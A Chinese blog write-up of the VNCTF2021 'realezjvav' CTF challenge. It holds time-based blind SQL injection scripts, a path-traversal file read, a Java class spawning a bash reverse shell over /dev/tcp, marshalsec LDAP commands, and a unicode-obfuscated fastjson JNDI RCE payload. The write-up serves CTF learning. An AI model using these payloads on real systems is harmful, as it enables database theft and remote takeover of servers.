VNCTF2021 realezjvav复现(fastjson漏洞利用)

最新推荐文章于 2024-08-08 17:20:38 发布
最新推荐文章于 2024-08-08 17:20:38 发布
阅读量2.1k 收藏
点赞数 3
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanmiqi/article/details/114893754
版权

VNCTF2021 realezjvav复现

漏洞点:

sql注入
fastjson漏洞(学到了学到了ORZ)

参考

官方wp
红队武器库:fastjson小于1.2.68全漏洞RCE利用exp
bfengj师傅

复现过程

根据页面提示(Only the admin can get the right page) 以及源码,提示是sql注入,确定了用户名为admin,密码用test’ 报错500 用test’ # 正常200,fuzz下以及看师傅们的wp,知道要用笛卡儿积盲注

payload1:

import requests
from time import *

url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=""
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if j==min:
            flag+=chr(j)
            print(flag)
            break
        payload="-1'or if(ascii(substr(password,{},1))<{},(SELECT count(*) FROM information_schema.tables A,information_schema.tables B,information_schema.tables C),1)#".format(i,j)
        data={
            'username':'admin',
            'password':payload
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.7)
            min=j
        except:
            max=j
        sleep(0.4)

payload2:

import requests
url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=''
for i in range(1,50):
    f1=flag
    top=127
    low=33
    while low<=top:
        mid=(top+low)//2
        # p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        # p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        data1={'username':'admin','password':p1}
        data2={'username':'admin','password':p2}
        try:
            print(i,mid)
            r1=requests.post(url,data=data1,timeout=1)
        except requests.exceptions.ReadTimeout as e:
            flag+=chr(mid)
            print(flag)
            break
        except Exception as e:
            pass
        else:
            try:
                r2=requests.post(url,data=data2,timeout=1)
            except requests.exceptions.ReadTimeout as e:
                low=mid+1
            except Exception as e:
                pass
            else:
                top=mid-1
    if flag==f1:
        break

得 no_0ne_kn0w_th1s
在这里插入图片描述
登录后有个创建角色功能,以及源码上有个读文件的,尝试任意文件读取 读pom.xml
在这里插入图片描述
/searchimage?img=…/…/…/…/…/pom.xml

在这里插入图片描述
网上找payload

Fastjson < 1.2.68
Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有

具体原理在参考第一条上。
复现的时候用rmi协议一直没成功,参考wp用了ldap协议可以成功执行命令

记录下详细步骤

先创建个Exploit.java

public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec(
                    "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwL2lwLzg3NjUgMD4mMQ==}|{base64,-d}|{bash,-i}");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}

base64的地方换成自己的vps来反弹shell 我这里用的是8765 端口进行反弹
javac Exploit.java 生成 Exploit.class 文件
并在当前目录下

python3 -m http.server 8888

在这里插入图片描述
接着我们要去github上下载个
marshalsec
下载好了构建一下

mvn clean package -DskipTests

进入target目录,开启ldap服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ip:8888/#Exploit" 9999

嫌麻烦的可以尝试用下这个师傅写的工具 一键搭建
工具
只需要在服务器上

java -cp fastjson_tool.jar fastjson.HRMIServer 0.0.0.0 9999 "bash=bash -i >&/dev/tcp/x.x.x.x/8765 0>&1"

最后POST请求的payload

roleJson={"name":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class","val":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","dataSourceName":"ldap://ip:9999/Exploit","\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074":true}}}

用unicode来绕过
在这里插入图片描述

成功反弹
在这里插入图片描述

ISMidi
关注
专栏目录
Fastjson 漏洞利用技巧
05-08 2829
每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。01、自动化漏洞检测一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。Github项目地址:https://gi...
Fastjson漏洞
weixin_43873557的博客
02-06 5303
Fastjson概述 Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到JavaBean。 ➢历史漏洞 Fastjson <=1.2.24 反序列化远程命令执行漏洞 Fastjson <=1.2.41 反序列化远程命令执行漏洞 Fastjson <=1.2.42 反序列化远程命令执行漏洞 Fastjson <=1.2.43 反序列化远程命令执行漏洞
[VNCTF 2021]realezjvav 复现
feng的博客
03-16 1199
前言 这次VNCTF的题目还是挺难的,web唯一一道php直接把我按着锤,只会php的我居然第一时间先去复现这道java(笑) 复现 跟着ha1师傅的WP走一遍,中间自己还好没有出什么太大的问题,虽然不会java,但是也拿SpringBoot写过一点点东西,对于“大名鼎鼎”的fastjson也是有所耳闻。 进入环境,f12看一下源码,可以看到注释里写的:both username and password are right , then you can enter the next level。再根据h
Java代码审计-fastjson反序列化漏洞分析
最新发布
qq_44780157的博客
08-08 2000
Fastjson反序列化漏洞各个版本的原理浅析。
VNCTF2021[WEB]
Y4tacker的博客
03-18 3674
文章目录前言Ez_gamenaiverealezjvavEasy_laravel 前言 这次比赛题目质量很好,本菜鸡做出了两道web题目,还是比较开心,只是赛后复现laravel一天半也没有成功,我好自闭啊 Ez_game 在game.js里面发现,直接放到console里面跑,得到flag ["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6
fastjson-autotype-bypass-demo:fastjson 1.2.68版本自动键入绕过
03-08
fastjson-autotype-bypass-demo fastjson 1.2.68版本有限制自动类型绕过 参考 《 fastjson 1.2.68自动键入绕过反序列化细分小工具的一种挖掘思路》: ://b1ue.cn/archives/382.html 《 fastjson 1.2.68最新版本有限制自动键入绕过》: ://b1ue.cn/archives/348.html
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2307
Fastjson组件反序列化分析,从基础到RCE的过程笔记
fastjson框架漏洞复现
没有
10-23 2365
fastjson是阿里巴巴开源的json解析库,通常被用于java object和json字符之间进行转换,提供两个方法json.tojsonstring和json.parseobject/json.parse来分别实现序列化与反序列化。
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
【Polarctf】web ezjava
xsx213的博客
10-13 249
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
WEB-INF 基础知识
王嘟嘟的博客
04-08 5878
0x00 前言 对WEB-INF进行一个简单的了解。 0x01 正文 WEB-INF是java的WEB应用的安全目录。 1.WEB-INF目录 WEB-INF/web.xml web应用程序配置文件,描述了servlet和其他的应用组件配置及命名规则。 WEB-INF/classes 包含了站点所有用的class文件,包括servlet class和非servlet class WEB-INF/...
Java安全(十四) CTF-Java题目复现
WDWAGAAFGAGDADSA的博客
05-04 2501
最近复现学习的java题目
vnctf easy_java
weixin_53747083的博客
03-11 4356
前段时间小编参加了vnctf并怀疑人生了 (因为我不会java),但我在比赛复现后询问了大佬,再次审计代码,这两天捋顺了思路,这里写下我的解题过程进入页面,是这么一个页面 zh
Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )
ZL_1618的博客
08-16 211
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
NepCTF2023--部分wp
qing_chuan_的博客
08-14 467
下载拿到piano.bin,是个音频文件,拉进Audacity看一下,发现有频谱,通过放大缩小频谱发现有字符串,将字符串抄写下来,钱一部分是摩斯密码,后部分是16进制。去搜Atsuko Kagari”,发现为小魔女学园动漫女主角,去看了动漫,发现里面有着文字,新月文字和古龙语,去上网找解释。这道题就是个游戏,就是自己和机器人下棋,你自己先先连出来42和5子棋就可得到flag,不想在复现一遍了。题目说是一种很老的cve,题目又是java-checkin,上网搜,找到一个跟java有关得cve。
【2022 DSCTF决赛wp】
qq_45603443的博客
08-04 940
2022 DSCTF决赛wp
从xxe到rce-记一道ctf中的java题
灰太的表格的博客
04-02 1244
从xxe到rce-记一道ctf中的java题
fastjson漏洞利用
09-07
对于Fastjson漏洞利用,可以通过利用Fastjson的反序列化漏洞来实施攻击。这些漏洞可能导致远程代码执行或者JNDI注入的风险。具体来说,攻击者可以构造一个恶意的JSON字符串,其中包含一个特殊的类或对象,以触发Fastjson在反序列化时执行恶意的代码。这样的攻击可以导致服务器受到攻击者完全控制的风险。 为了防止Fastjson漏洞的利用,可以采取以下措施: 1. 及时更新Fastjson库至最新版本,因为Fastjson团队通常会修复已知的安全漏洞。 2. 配置Fastjson的autotype机制,限制只反序列化预定义的安全类。这样可以减少恶意类的反序列化风险。 3. 限制Fastjson的使用范围,仅在可信赖的环境中使用。不要从不受信任的来源接收、解析和反序列化JSON数据。 4. 使用安全的编码和输入验证,确保JSON数据的完整性和真实性。 需要注意的是,漏洞利用是一种恶意行为,违法的使用是不被允许的。这里提供的信息仅供技术参考和学习目的。使用Fastjson的开发人员应该保持警惕,及时更新并采取适当的安全措施来保护系统的安全。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值